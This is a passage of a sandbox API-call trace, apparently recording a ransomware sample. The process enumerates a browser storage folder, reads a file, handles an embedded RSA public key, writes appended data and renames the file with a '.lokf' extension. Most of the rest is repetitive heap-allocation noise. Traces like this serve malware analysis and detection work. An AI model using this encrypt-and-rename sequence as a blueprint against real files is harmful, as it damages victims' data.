ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0061.388] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.389] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.389] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\") returned="36USA68T\\" [0061.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0061.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0061.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0061.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.389] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.389] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.389] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.389] PathFindFileNameW (pszPath="") returned="" [0061.389] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.390] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 1 [0061.390] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned=".xml" [0061.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.390] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=13) returned 1 [0061.390] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.392] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.393] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd, lpOverlapped=0x0) returned 1 [0061.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.393] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0061.394] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.394] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.394] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.394] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.394] GetLastError () returned 0x0 [0061.394] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.394] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0061.394] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.394] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.394] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.395] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.395] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.395] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0061.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.395] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.395] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.395] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.396] CloseHandle (hObject=0x5cc) returned 1 [0061.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf0) returned 0x329e1f0 [0061.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x900) returned 0x326aa18 [0061.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.396] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.lokf")) returned 1 [0061.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0061.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.396] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.397] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0061.397] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228eb8 | out: hHeap=0x660000) returned 1 [0061.397] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228eb8 [0061.397] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) 